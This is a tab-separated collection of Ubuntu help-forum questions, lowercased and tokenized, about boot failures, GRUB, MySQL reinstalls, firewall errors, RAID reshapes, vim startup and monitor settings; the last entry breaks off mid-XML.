465329	`` could not write bytes broken pipe '' error on 12.04 lts	i have installed kali linux in virtualbox on ubuntu 12.04 lts . then i tried to create a common shared folder between the guest and the host . i installed additional plugins for shared folder , it removed some xserver package . at that time it worked properly and i shutdown it . when the next day i booted my ubuntu it shows : could not write bytes broken pipe then i tried the ways given for this problem nothing works . i tried to install xserver-xorg via sudo apt-get install xserver-xorge-video-all it shows it could not locate xserver-xorg-all . i am able to login through terminal
465330	are there dedicated folders for user made sources and libraries/modules ?	this is a very basic question , yet i ca n't find anything relevant . is there a standard directory where to put the sources of your projects and the location of the libraries/modules they use ( which are made for the project and are non standard ) ?
465332	unable to re install mysql on ubuntu 14.04 : dependency problems	ubuntu unity 14.04 lts with all lenses removed , except files . ( hate the dash . ) i have a lamp system for web site development . i want to put all my data files in a particular partition that i can easily copy back and forth between my desktop and notebook machines . on the notebook ( also running 14.04 lts unity -64 ) i performed these steps , which worked perfectly : sudo /etc/init.d/mysql stop sudo cp -r -p /var/lib/mysql /ddr/mysql gedit /etc/mysql/my.cnf < < changed datadir from /var/lib/mysql to /ddr/mysql > > sudo gedit /etc/apparmor.d/usr.sbin.mysqld < < changed all lines /var/lib/mysql as above > > sudo /etc/init.d/apparmor reload sudo /etc/init.d/mysql restart when i attempted the very same thing on the desktop everything fell apart . i 've tried reinstalling , purging , autoremoving , as mentioned here , here , and here , but the reinstall always hangs with the following message : sadhu @ desktop : ~ $ sudo apt-get install mysql-server mysql-common mysql-client ... < output snipped > ... setting up mysql-client ( 5.5.37-0ubuntu0.14.04.1 ) ... dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing package mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sadhu @ desktop : ~ $ i get the same error whether or not i specify a password at install time . i update every day . the desktop is an i3 , 4gb ram , non-uefi ; the notebook is an i5 , 4gb ram , with efi but disabled . they are connected via back-to-back peer network . my /ddr partition ( containing all my data ) has over 100 gb free space . 14.04 is installed on a 20gb partition on an ssd ; 7.6gb free space . can someone help me get mysql working again ?
465335	ubuntu ufw init failure	i have some strange ufw behaviour . whenever i install it cleanly and add some allowed ports to it ( without restarting ) it works great . but when i restart ufw or the whole server for the first time after that , i get the following error whenever i try to enable ufw : error : problem running ufw-init modprobe : error : ../libkmod/libkmod.c:507 kmod_lookup_alias_from_builtin_file ( ) could not open builtin file '/lib/modules/2.6.32-042stab088.4/modules.builtin.bin' modprobe : fatal : module nf_conntrack_ftp not found . modprobe : error : ../libkmod/libkmod.c:507 kmod_lookup_alias_from_builtin_file ( ) could not open builtin file '/lib/modules/2.6.32-042stab088.4/modules.builtin.bin' modprobe : fatal : module nf_nat_ftp not found . modprobe : error : ../libkmod/libkmod.c:507 kmod_lookup_alias_from_builtin_file ( ) could not open builtin file '/lib/modules/2.6.32-042stab088.4/modules.builtin.bin' modprobe : fatal : module nf_conntrack_netbios_ns not found . ip6tables-restore : line 4 failed ip6tables-restore : line 73 failed ip6tables-restore : line 67 failed sysctl : permission denied on key 'net.ipv4.tcp_sack' problem running '/etc/ufw/before6.rules' problem running '/lib/ufw/user6.rules i ca n't figure out what 's the problem , anyone have any idea ? thanks !
465336	how to connect reliance netconnect+ dongle in ubuntu 12.04 ?	i have a dual boot system with ubuntu 12.04 and windows 8 ( pre-installed ) . everything worked fine but my relaince netconnect+ dongle never connects . although wifi is working fine . what should i do ?
465337	ati graphics driver in ubuntu 14.04	i am using a lenovo ideapad laptop with graphics card configuration as radeon hd 8570a/8570m on ubuntu 14.04 . it shows me `` the system is running in low graphics mode '' while booting . so i am following this answer to solve my error . i have tried amd-catalyst 14.4 and 13.12 from this site . but while installing these drivers , my terminal goes like this : when i click or close the message box , the installation stops . so how do i install the appropriate driver ?
465338	software updater does n't display ubuntu 14.04	i have the weirdest problem . software updater will occasionally not display in unity on 14.04 . if i manually start software updater everything works fine , but if there are updates and the window ( should ) pops up , i ca n't access the window . i can see the little triangle next to the icon in the launcher saying there 's a window , but the window is nowhere to be seen . if i right click to close it and then launch it then everything is fine . how do i find this hidden window or figure out what the problem might be ?
465341	ca n't access uploaded image to generate thumbnail in php	i had trouble fixing the file uploading , but then i ran chmod a+w /var/www and it worked - files were being uploaded to my specified directory . however , my script also generates a thumbnail immediately after the file is uploaded . this part is not working . i 'm assuming that the files uploaded by the script are locked ( they have a small lock appearing near them when going to the directory manually ) and it ca n't grab the uploaded file and create a new thumbnail file based on it . i 'm not getting any error or something . how do i edit the permissions in the way that lets me create new files using `` locked '' files ?
465344	is it possible to pause/abort mdadm reshape ?	saturday i added a new drive to my mdadm array , and the reshape process is taking a long time . unfortunately there 's a nasty storm coming , and i 'm likely going to lose power , which will probably do bad things to my mdadm grow operation . current status # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid5 sdh1 [ 6 ] sdc1 [ 0 ] sdg1 [ 5 ] sdf1 [ 3 ] sde1 [ 2 ] sdd1 [ 1 ] 11720534016 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 6/6 ] [ uuuuuu ] [ ===== > ... ... ... ... ... ] reshape = 25.9 % ( 759125024/2930133504 ) finish=4091.0min speed=8844k/sec mdadm -- detail /dev/md0 mdadm -- detail /dev/md0 /dev/md0 : version : 1.2 creation time : sat mar 23 07:41:24 2013 raid level : raid5 array size : 11720534016 ( 11177.57 gib 12001.83 gb ) used dev size : 2930133504 ( 2794.39 gib 3000.46 gb ) raid devices : 6 total devices : 6 persistence : superblock is persistent update time : tue may 13 11:34:08 2014 state : clean , reshaping active devices : 6 working devices : 6 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 512k reshape status : 26 % complete delta devices : 1 , ( 5- > 6 ) name : foxery:0 ( local to host foxery ) uuid : afbbf397 : afc6ac78:6e7d376b : eedc2dd0 events : 9641 number major minor raiddevice state 0 8 33 0 active sync /dev/sdc1 1 8 49 1 active sync /dev/sdd1 2 8 65 2 active sync /dev/sde1 3 8 81 3 active sync /dev/sdf1 5 8 97 4 active sync /dev/sdg1 6 8 113 5 active sync /dev/sdh1 is it possible to stop/pause the mdadm grow process ? can i stop/abort the reshape process , and run with bitmaps ? i used this doc to improve speeds but it did n't do all that much since most of the speed would come from enabling bitmapping , which is n't doable on the fly , afaik .
465355	cant login after updates to ubuntu 14.04 lts	i ca n't log in ubuntu 14.04 lts after i accepted the usual software updater updates this morning , including codec updates and the latest thunderbird release . now when i enter my usual login and password , the system seems to load the desktop as usual but then gets stuck indefinitely . only the guest login will allow me to see a plain desktop with no privileges . i tried to apply the ctrl+alt+f1/ctrl+alt+f7 or the xauthority manips found in similar threads , but here again i ca n't sudo anything without prior typing my admin user login & password . from there on i only get an obvious error message : invalid user/login . how come such a simple update suddenly change/overwrite your regular user account password , i already lost half-a-day of work because of this . please advise on how i can get my user account logging in normally just as this very morning before i downloaded these updates . thanks for your support & sound answers .
465358	how to find the most requested page on a server ?	i have an ubuntu 12.04 server with apache2 that i am hosting 10 different sites on . is there a ssh command or some way to find the most requested page on the server ?
465359	installation , dual operating systems	i 'm about to switch my os from windows xp to ubuntu on an hp laptop , primarily for internet use . is there an `` idiot 's guide '' anywhere here that i can print up before i try it ? the plan is to put the os on a separate usb hard drive so , if i really mess up , i wo n't lose everything on the laptop hd . i have some technical programs on the laptop that wo n't run on anything but windows so i will still need xp on occasion . thanks .
465360	problem installing ubuntu via usb in asus r510c	my boot loader does n't recognize the usb for booting and installing ubuntu . i already disabled the secure boot and it still does not recognize the usb . if there is anyone that has encountered the same problem and knows how to solve it please show me the light .
465364	issues installing grub on 14.04 install	i 'm having issues installing grub 2 on a uefi system , i 'm not sure what to do . i just tried to use boot-repair and got the following : http : //paste.ubuntu.com/7458271/ boot info script e7fc706 + boot-repair extra info [ boot-info 23dec2013 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb .
465367	installing always fail	i can see it 's not only me a lot he have a problem about ubuntu installing . so can you make video for that installing as you know 90 % of the guys he have os windows 8 , still your software used by some not like windows 8 and i think that`s because the installing 70 % so better to not answer and show us full installing for ubuntu yesterday i try more then 20 time always stop or or or each time other problem new problem step by step : what we should have in our system ? better to reboot cd or we can do the installing from windows 8 ? can we have two os and what we can do to reboot from windows 8 or ubuntu ? the installing ? give us the way to used your system only some step and we can know the way after pc should be mac or not ? we should installing anything before ubuntu thanks to open ticket with me that i need full support my information is : i will let you know my system now is windows 8.1 my laptop hp i5 2.6ghz ram 6gb hard drive 750gb system type : 64-bit operating system , x64-based processor i want the installing step + what i should have b4 the installing ubuntu + i want when the my pc working or starting asking what os i want win 8 or ubuntu and i choice the one i want some easy step if ubuntu working some step not to much and i will learn alone but the way only to start i will support some guys with me also he want change to ubuntu but he or lol we have the same problem let`s try . i want the installing step + what i should have b4 the installing ubuntu + i want when the my pc working or starting asking what os i want win 8 or ubuntu and i choice the one i want some easy step if ubuntu working some step not to much and i will learn alone but the way only to start i will support some guys with me also he want change to ubuntu but he or lol we have the same problem , let`s try .
465369	reset keyboard preferences ( 14.04 )	when i first installed ubuntu it worked flawlessly and the sound control buttons on my keyboard worked as expected . but now i just configured volume up , volume down , and mute to other key combos but when i set them back to their default keys they donât work anymore . so i was guessing if there was a way to reset the functions each key to stock ubuntu state ? ( sorry for such idiotic questions ... i 've just started using ubuntu ) p.s : i 've already tried a lot of solutions posted on other askubuntu pages but none worked .
465371	script to open vlc with local ip and port	i am trying to create a script to open vlc with my local ip and port 8888 . my current script : # ! /bin/bash vlc http : //10.0.0.1:8888/ this works fine , but when i go to another network the local ip changes to 10.0.0.64 , and the script is useless . i managed find my new local ip by using : hostname -i the new script : # ! /bin/bash a= '' http : // '' b= '' :8888/ '' ip= '' $ ( hostname -i ) '' final= $ { a } $ { ip } $ { b } vlc $ final but this dose n't work . echo $ final http : //10.0.0.0.1 :8888/ hmmm ... why does my variable have a space in it and how can i remove it ? does anyone know of a better way of doing this ?
465372	vim in 14.04 ( trusty ) starts up in replace mode	i just deployed a handful of 14.04 systems and i 'm noticing that whenever i vim something , vim is already in replace mode . as i 'm used to being in command mode on starting , this is rather disorienting . any idea why ? i do n't see any obvious culprits in /etc/vim/vimrc , but this happens with every user on the system . installed relevant packages : $ aptitude search vim | grep ^i i vim - vi improved - enhanced vi editor i vim-common - vi improved - common files i vim-nox - vi improved - enhanced vi editor - with sc i vim-runtime - vi improved - runtime files i vim-tiny - vi improved - enhanced vi editor - compact vim -v output : # vim -v chdir ( /usr/share/vim ) fchdir ( ) to previous dir sourcing `` $ vim/vimrc '' searching for `` debian.vim '' in `` /root/.vim , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /root/.vim/after '' searching for `` /root/.vim/debian.vim '' searching for `` /usr/share/vim/vimfiles/debian.vim '' searching for `` /usr/share/vim/vim74/debian.vim '' chdir ( /usr/share/vim/vim74 ) fchdir ( ) to previous dir line 10 : sourcing `` /usr/share/vim/vim74/debian.vim '' finished sourcing /usr/share/vim/vim74/debian.vim continuing in /usr/share/vim/vimrc searching for `` /usr/share/vim/vimfiles/after/debian.vim '' searching for `` /root/.vim/after/debian.vim '' chdir ( /usr/share/vim/vim74/syntax ) fchdir ( ) to previous dir line 20 : sourcing `` /usr/share/vim/vim74/syntax/syntax.vim '' searching for `` syntax/synload.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/syntax/synload.vim '' searching for `` /var/lib/vim/addons/syntax/synload.vim '' searching for `` /usr/share/vim/vimfiles/syntax/synload.vim '' searching for `` /usr/share/vim/vim74/syntax/synload.vim '' chdir ( /usr/share/vim/vim74/syntax ) fchdir ( ) to previous dir line 19 : sourcing `` /usr/share/vim/vim74/syntax/synload.vim '' searching for `` syntax/syncolor.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/syntax/syncolor.vim '' searching for `` /var/lib/vim/addons/syntax/syncolor.vim '' searching for `` /usr/share/vim/vimfiles/syntax/syncolor.vim '' searching for `` /usr/share/vim/vim74/syntax/syncolor.vim '' chdir ( /usr/share/vim/vim74/syntax ) fchdir ( ) to previous dir line 21 : sourcing `` /usr/share/vim/vim74/syntax/syncolor.vim '' finished sourcing /usr/share/vim/vim74/syntax/syncolor.vim continuing in /usr/share/vim/vim74/syntax/synload.vim searching for `` /usr/share/vim/vimfiles/after/syntax/syncolor.vim '' searching for `` /var/lib/vim/addons/after/syntax/syncolor.vim '' searching for `` /root/.vim/after/syntax/syncolor.vim '' finished sourcing /usr/share/vim/vim74/syntax/synload.vim continuing in /usr/share/vim/vim74/syntax/syntax.vim searching for `` filetype.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/filetype.vim '' searching for `` /var/lib/vim/addons/filetype.vim '' searching for `` /usr/share/vim/vimfiles/filetype.vim '' searching for `` /usr/share/vim/vim74/filetype.vim '' chdir ( /usr/share/vim/vim74 ) fchdir ( ) to previous dir line 25 : sourcing `` /usr/share/vim/vim74/filetype.vim '' searching for `` ftdetect/*.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/ftdetect/*.vim '' searching for `` /var/lib/vim/addons/ftdetect/*.vim '' searching for `` /usr/share/vim/vimfiles/ftdetect/*.vim '' searching for `` /usr/share/vim/vim74/ftdetect/*.vim '' searching for `` /usr/share/vim/vimfiles/after/ftdetect/*.vim '' searching for `` /var/lib/vim/addons/after/ftdetect/*.vim '' searching for `` /root/.vim/after/ftdetect/*.vim '' not found in 'runtimepath ' : `` ftdetect/*.vim '' finished sourcing /usr/share/vim/vim74/filetype.vim continuing in /usr/share/vim/vim74/syntax/syntax.vim searching for `` /usr/share/vim/vimfiles/after/filetype.vim '' searching for `` /var/lib/vim/addons/after/filetype.vim '' searching for `` /root/.vim/after/filetype.vim '' finished sourcing /usr/share/vim/vim74/syntax/syntax.vim continuing in /usr/share/vim/vimrc searching for `` syntax/syncolor.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/syntax/syncolor.vim '' searching for `` /var/lib/vim/addons/syntax/syncolor.vim '' searching for `` /usr/share/vim/vimfiles/syntax/syncolor.vim '' searching for `` /usr/share/vim/vim74/syntax/syncolor.vim '' chdir ( /usr/share/vim/vim74/syntax ) fchdir ( ) to previous dir line 25 : sourcing `` /usr/share/vim/vim74/syntax/syncolor.vim '' finished sourcing /usr/share/vim/vim74/syntax/syncolor.vim continuing in /usr/share/vim/vimrc searching for `` /usr/share/vim/vimfiles/after/syntax/syncolor.vim '' searching for `` /var/lib/vim/addons/after/syntax/syncolor.vim '' searching for `` /root/.vim/after/syntax/syncolor.vim '' searching for `` filetype.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/filetype.vim '' searching for `` /var/lib/vim/addons/filetype.vim '' searching for `` /usr/share/vim/vimfiles/filetype.vim '' searching for `` /usr/share/vim/vim74/filetype.vim '' chdir ( /usr/share/vim/vim74 ) fchdir ( ) to previous dir line 36 : sourcing `` /usr/share/vim/vim74/filetype.vim '' finished sourcing /usr/share/vim/vim74/filetype.vim continuing in /usr/share/vim/vimrc searching for `` /usr/share/vim/vimfiles/after/filetype.vim '' searching for `` /var/lib/vim/addons/after/filetype.vim '' searching for `` /root/.vim/after/filetype.vim '' searching for `` ftplugin.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/ftplugin.vim '' searching for `` /var/lib/vim/addons/ftplugin.vim '' searching for `` /usr/share/vim/vimfiles/ftplugin.vim '' searching for `` /usr/share/vim/vim74/ftplugin.vim '' chdir ( /usr/share/vim/vim74 ) fchdir ( ) to previous dir line 36 : sourcing `` /usr/share/vim/vim74/ftplugin.vim '' finished sourcing /usr/share/vim/vim74/ftplugin.vim continuing in /usr/share/vim/vimrc searching for `` /usr/share/vim/vimfiles/after/ftplugin.vim '' searching for `` /var/lib/vim/addons/after/ftplugin.vim '' searching for `` /root/.vim/after/ftplugin.vim '' searching for `` indent.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/indent.vim '' searching for `` /var/lib/vim/addons/indent.vim '' searching for `` /usr/share/vim/vimfiles/indent.vim '' searching for `` /usr/share/vim/vim74/indent.vim '' chdir ( /usr/share/vim/vim74 ) fchdir ( ) to previous dir line 36 : sourcing `` /usr/share/vim/vim74/indent.vim '' finished sourcing /usr/share/vim/vim74/indent.vim continuing in /usr/share/vim/vimrc searching for `` /usr/share/vim/vimfiles/after/indent.vim '' searching for `` /var/lib/vim/addons/after/indent.vim '' searching for `` /root/.vim/after/indent.vim '' finished sourcing $ vim/vimrc chdir ( /root ) fchdir ( ) to previous dir could not source `` $ home/.vimrc '' chdir ( /root/.vim ) fchdir ( ) to previous dir could not source `` ~/.vim/vimrc '' chdir ( /root ) fchdir ( ) to previous dir could not source `` $ home/.exrc '' searching for `` plugin/**/*.vim '' in `` /root/.vim , /var/lib/vim/addons , /usr/share/vim/vimfiles , /usr/share/vim/vim74 , /usr/share/vim/vimfiles/after , /var/lib/vim/addons/after , /root/.vim/after '' searching for `` /root/.vim/plugin/**/*.vim '' searching for `` /var/lib/vim/addons/plugin/**/*.vim '' searching for `` /usr/share/vim/vimfiles/plugin/**/*.vim '' searching for `` /usr/share/vim/vim74/plugin/**/*.vim '' chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/getscriptplugin.vim '' finished sourcing /usr/share/vim/vim74/plugin/getscriptplugin.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/gzip.vim '' finished sourcing /usr/share/vim/vim74/plugin/gzip.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/matchparen.vim '' finished sourcing /usr/share/vim/vim74/plugin/matchparen.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/netrwplugin.vim '' finished sourcing /usr/share/vim/vim74/plugin/netrwplugin.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/rrhelper.vim '' finished sourcing /usr/share/vim/vim74/plugin/rrhelper.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/spellfile.vim '' finished sourcing /usr/share/vim/vim74/plugin/spellfile.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/tarplugin.vim '' finished sourcing /usr/share/vim/vim74/plugin/tarplugin.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/tohtml.vim '' finished sourcing /usr/share/vim/vim74/plugin/tohtml.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/vimballplugin.vim '' finished sourcing /usr/share/vim/vim74/plugin/vimballplugin.vim chdir ( /usr/share/vim/vim74/plugin ) fchdir ( ) to previous dir sourcing `` /usr/share/vim/vim74/plugin/zipplugin.vim '' finished sourcing /usr/share/vim/vim74/plugin/zipplugin.vim searching for `` /usr/share/vim/vimfiles/after/plugin/**/*.vim '' searching for `` /var/lib/vim/addons/after/plugin/**/*.vim '' searching for `` /root/.vim/after/plugin/**/*.vim '' reading viminfo file `` /root/.viminfo '' info oldfiles press enter or type command to continue
465373	mapping directories/path to another	ok , so i have two programs which use the same massive data files , located in /public_mm/db/ /public_semrep/data/db/ is it possible to map one of these paths to the other folder so i do n't have to save two copies of each of these huge files ? i 'm pretty sure this can be done , i just do n't know the lingo to search it up and find directions .
465374	slow boot ubuntu 14.04	a few months ago i changed on my lenovo q180 htpc from windows to ubuntu ( only ubuntu installation , without dual boot ) . now , after upgrading to ubuntu 14.04 i am noticing a slowdown on boot . therefore , i followed the instructions to check listing of dmesg . dmesg file i 'm not an expert , but i noticed 3 longer gaps in dmesg extract . the first gap occurs after 4.22 seconds : [ 4.220866 ] random : nonblocking pool is initialized [ 15.022778 ] adding 4188156k swap on /dev/sda5 . priority : -1 extents:1 across:4188156k fs the other after 29.51 seconds : [ 29.514165 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 32.096660 ] init : plymouth-upstart-bridge main process ended , respawning and third ( longer ) gap after 32.13 seconds : [ 32.133380 ] init : plymouth-upstart-bridge main process ended , respawning [ 55.489238 ] type=1400 audit ( 1399922728.858:68 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=2196 comm= '' apparmor_parser '' the sum of these gaps are more than 65 % of the boot time displayed by dmesg . i tried to find answers to these gaps , but unfortunately i could not find nothing , what exactly match my gaps . i would therefore ask for advice , if there is a way , how to optimize these gaps , or if these gaps are normal . i am also enclosing bootchart file : bootchart lenovo q180 specifications : - intel atom d2700 @ 2.3ghz - 4gb ddr3 ram - 320gb hard drive ( 5400 rpm ) - amd radeon hd 6450 ( 512 mb ) - lenovo n5902 multimedia remote with keyboard - 10/100/1000 realtek rtl8111//8168b gigabit nic - 802.11 b/g/n realtek rtl8188ce wireless nic - 4x usb 2.0 ports ( in the back ) - 2x usb 3.0 ports ( in the front ) - hdmi and vga port - sd/sdhc/sdxc/mmc/ms/ms_pro card reader thanks in advance !
465377	enabling window decorations made me disable unity plugin . no borders	so i started messing around with compiz a bit i enabled window decorations but that made me disable unity plugin so no launcher and no task bar or whatever it 's called in linux i accidentaly minimised the compiz settings and poof it 's gone i opened the monitor settings to end compiz 's process now am stuck with no borders at all ! so i booted into live mode just to ask here : z do i need a fresh install or is there a solution ?
465379	why do n't i see my copy ( cloud storage ) icon on my menubar ?	since ubuntu one is no more ( : '- ( ) i am using copy . but i ca n't see the copy icon on my menu bar ( or panel or whatever ) . i am sure that copy is running in the background ( system monitor says so ) . i have libappindicator1 and libappindicator3-1 . installed . yet i do n't see the icon . any ideas ? btw , i use ubuntu 14.04 lts with unity .
465380	installing ubuntu or mint from usb	i 'm trying to create a live usb to install mint 16 . my laptop can boot from usb 100 % ( i have installed windows 7 from usb ) the problem is , whenever i use any tool to create a live usb to install ubuntu or mint . i can see all the files in syslinux folder and i can read syslinux.cfg , but whenever i remove the usb and open syslinux folder i find it empty . i have tried : ⠀1 . lili usb ⠀2 . unetbootin ⠀3 . universal usb creator ⠀4 . rufus ⠀5 . yumi ⠀6 . live usb install all with the same results , having syslinux folder empty only after removing the usb or when rebooting . in some of the tools mentioned above , the syslinux.cfg is placed in the root of my usb , and it wo n't be deleted , but the file content will be `` null null null null '' more info : ⠀1 . i double checked md5 on all the isos ⠀2 . created the usb using ubuntu 10.04 using the latest unetbootin ⠀3 . i have used the same usb stick ( thumb drive ) to install a previous linux mint on another laptop ⠀4 . i have tried more than one usb stick ( thumb drive ) error messages encountered : no default or ui configuration directive found !
465381	grant permission for new created files inside folder automatically	i have a folder which permission is set to 777 but when i add any files or folder unziping in that folder . extracted files or folder permission never change . for a clear picture : - > distination folder permission is 777 and i want what i will add in that folder will automatically get permission of 777 . problem : - > when i add any files or folder by extracting .zip in that folder , extracted folder/files permission wo n't change automatically . i always have to chmod for newly add file/folder !
465385	ubuntu all of a sudden fails to boot on thinkpad t430	not booting running ubuntu on my t430 has been fairly straightforward and great until just now . after i used my windows for some days , ubuntu all of a sudden fails to boot . after i select ubuntu in grub , i get the following screen : error : file `` /vmlinuz-3.13.0.24-generic.efi.signed '' not found unalinged pointer to 0xd0a26c68 aborted . press any key to exit . neiter does a live system to fix that , i tried to launch a live ubuntu to do things like update the packages and reinstall grub . but the live ubuntu failed to boot as well , it only gave me the grub command line . unfortunately , i do n't know what to do with it . what now ? i have no idea where a problem like this could come from . in windows , lenovo showed a uefi-update wich i thought i had deselected , but it might just have slipped in . anyway , can a problem like this be triggered by a updated uefi ? starting in recovery mode does n't help . i cleaned old kernels to have space on my /boot - partition again so i can not try older kernels . until now , the current kernel just worked for me . as i do n't have a os i can work with in the moment i would be very grateful for any tips , hints or suggestions .
465387	dash ca n't find samba although terminal says it 's all installed . ubuntu 14.04	i have installed samba using apt-get install , also python-glade2 and system-confg-samba . when i type samba in the dash it finds nothing . i can see my windows machine from 14.04 but the folders are empty - they 're actually not . i can see the linux machine but i ca n't access it - i 'm asked for a password but it 's not accepted and the authentication box keeps coming up . how can i fix this ?
465391	windows 7 dual boot , tried installing ubuntu on top of another ubuntu installation	so i had windwos 7 running fine and decided that i want to install ubuntu 14.04 lts . i downloaded the image and made bootable usb drive . i then went ant clicked install ubuntu , it loaded for quite a while and then it said that i already have another ubuntu installation . oh snap , i totally forgot about that . so i clicked erase ubuntu and reinstall . it loaded for a few minutes and then it said that non recoverable error occured . then i restarted my pc and i got this error : reboot and select proper boot device or insert boot media in selected boot device and press a key i then i tried all available boot options however they all gave me the same error . i am currently on ubuntu live usb . i tried installing boot-repair and running it with the recommended settings , however it did n't fix it . what do i do now ? tell me if you need any more information . boot-repair pastebin : http : //paste.ubuntu.com/7458605/
465393	ubuntu 13.10 allows connections from lan but not from outside lan	ssh ports configured to all 22 and another one . i can connect from another linux/windows workstations on my home lan no problem . same thing for nomachines nx server . teamviewer connects with no problems . router is configured to forward ports . i can not connection from outside the lan or even if i use my public ip . nothing is listed in /etc/hosts.deny /etc/hosts.allow stopped and disabled ufw on ubuntu . flushed ip tables . $ iptables -l shows . chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain ufw-after-forward ( 0 references ) target prot opt source destination chain ufw-after-input ( 0 references ) target prot opt source destination chain ufw-after-logging-forward ( 0 references ) target prot opt source destination chain ufw-after-logging-input ( 0 references ) target prot opt source destination chain ufw-after-logging-output ( 0 references ) target prot opt source destination chain ufw-after-output ( 0 references ) target prot opt source destination chain ufw-before-forward ( 0 references ) target prot opt source destination chain ufw-before-input ( 0 references ) target prot opt source destination chain ufw-before-logging-forward ( 0 references ) target prot opt source destination chain ufw-before-logging-input ( 0 references ) target prot opt source destination chain ufw-before-logging-output ( 0 references ) target prot opt source destination chain ufw-before-output ( 0 references ) target prot opt source destination chain ufw-reject-forward ( 0 references ) target prot opt source destination chain ufw-reject-input ( 0 references ) target prot opt source destination chain ufw-reject-output ( 0 references ) target prot opt source destination chain ufw-track-input ( 0 references ) target prot opt source destination chain ufw-track-output ( 0 references ) target prot opt source destination please let me know if i am missing something . i am running out of ideas .
465398	why ca n't i boot ?	i get this when i try to boot after installing from cd : gnu grub version 1.99-21ubuntu 3.14 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub >
465400	how can i move the results of a recoll query to a folder ?	i 'd like to know if it 's possible to send matching files from recoll ( searches words or strings in the content of several files .pdf .doc , etc ) into a folder . thanks !
465402	how to install intel hd 4000 ubuntu 14.04 ?	i am new to ubuntu and i want to install the driver of intel hd 4000 , any help ? i tried a lot of thing but i got missing packages and make problems due to auto make versions mismatch , the graphics driver appears for me is intel速 ivybridge mobile and the brightness control does n't work
465403	ubuntu 14.04 dual monitor position reset at reboot	how can i make the monitor settings be saved after reboot ? i have configured my monitor on my lenovo t410s like this : after reboot its however reset to this : interestingly , my monitor.xml looks the way i wanted it : < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' lvds1 '' > < vendor > len < /vendor > < product > 0x4036 < /product > < serial > 0x00000000 < /serial > < width > 1440 < /width > < height > 900 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 180 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < output name= '' vga1 '' > < /output > < output name= '' hdmi1 '' > < /output > < output name= '' dp1 '' > < /output > < output name= '' hdmi2 '' > < /output > < output name= '' hdmi3 '' > < vendor > del < /vendor > < product > 0x4067 < /product > < serial > 0x3134374c < /serial > < width > 1920 < /width > < height > 1080 < /height > < rate > 60 < /rate > < x > 1440 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < output name= '' dp2 '' > < /output > < output name= '' dp3 '' > 